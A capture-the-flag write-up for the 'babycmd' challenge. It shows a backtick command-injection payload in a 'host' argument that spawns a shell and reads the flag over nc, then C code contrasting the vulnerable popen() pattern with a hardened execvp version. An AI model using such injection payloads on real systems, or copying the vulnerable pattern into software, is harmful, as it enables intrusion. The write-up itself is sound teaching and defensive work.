Baby's First (1 point): babycmd
Server: babycmd_3ad28b10e8ab283d7df81795075f600b.quals.shallweplayaga.me:15491
[Download](http://downloads.notmalware.ru/babycmd_3ad28b10e8ab283d7df81795075f600b)

```
$ md5sum babycmd
3ad28b10e8ab283d7df81795075f600b  babycmd
$ file babycmd
babycmd: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, stripped
$ execstack babycmd
- babycmd
$ ./babycmd
Welcome to another Baby's First Challenge!
Commands: ping, dig, host, exit
:
```
babycmd has three commands: ping, dig, and host. All of them are run through popen(), so we just have to find one that lets us inject into the command line. The host command lets the backtick character (`) through, and the shell uses backticks for command substitution.

If sh is injected inside backticks we get a shell, but we won't see any of its output until we exit the shell. At that point the substituted output becomes part of host's argument, and host prints it back to us in an error message.
```
$ nc babycmd_3ad28b10e8ab283d7df81795075f600b.quals.shallweplayaga.me 15491
Welcome to another Baby's First Challenge!
Commands: ping, dig, host, exit
: host ggg`sh`ggg
cat /home/babycmd/flag
exit
host: 'gggThe flag is: Pretty easy eh!!~ Now let's try something hArd3r, shallwe??ggg' is not in legal name syntax (label too long)
Commands: ping, dig, host, exit
:
```
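For contrast, here is the popen() pattern the writeup exploits next to a hardened form of the same host wrapper. This is an added example written for this page, not the challenge binary's code: the function names (`build_popen_cmdline`, `is_safe_hostname`, `run_host_noshell`) and the payload string used in `main` are assumptions chosen to mirror the writeup. The vulnerable half only builds the command line, to show that the backticks are handed to /bin/sh verbatim; the hardened half allow-lists hostname characters (rejecting a leading `-` so the value cannot turn into an option) and launches host with fork/execvp and an argv array, so no shell ever parses user input.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern: user text is spliced into a shell command line, so
 * backticks, ';', '|' and friends reach /bin/sh when popen() runs it.
 * Returns the length written, or -1 if the buffer is too small. */
int build_popen_cmdline(char *out, size_t outsz, const char *user_input) {
    int n = snprintf(out, outsz, "host %s", user_input);
    if (n < 0 || (size_t)n >= outsz) return -1;
    return n;
}

/* Allow-list check: only characters that can appear in a hostname.
 * A leading '-' is rejected so the value cannot become an option to host. */
int is_safe_hostname(const char *s) {
    size_t n = strlen(s);
    if (n == 0 || n > 253) return 0;
    if (s[0] == '-' || s[0] == '.' || s[n - 1] == '.') return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '-' && c != '.') return 0;
    }
    return 1;
}

/* Hardened form: validate, then fork/execvp with an argv array. No shell is
 * involved, so there is no command line for metacharacters to alter.
 * Returns host's exit status, -1 if the input is rejected, -2 on fork/exec error. */
int run_host_noshell(const char *name) {
    if (!is_safe_hostname(name)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -2;
    if (pid == 0) {
        char *const argv[] = { "host", (char *)name, NULL };
        execvp("host", argv);
        _exit(127);                 /* only reached if exec fails */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -2;
    if (WIFEXITED(status) && WEXITSTATUS(status) != 127) return WEXITSTATUS(status);
    return -2;
}

int main(void) {
    /* Constructed input: the injection string from the writeup above. */
    const char *payload = "ggg`sh`ggg";
    char cmd[256];
    build_popen_cmdline(cmd, sizeof cmd, payload);
    printf("popen() would hand the shell: %s\n", cmd);
    printf("allow-list accepts payload? %d\n", is_safe_hostname(payload));
    printf("run_host_noshell(payload) -> %d\n", run_host_noshell(payload));
    return 0;
}
```

The allow-list is the part that blocks this specific writeup; the execvp path is what removes the bug class, because even a character the allow-list missed would arrive at host as a literal argument rather than as shell syntax.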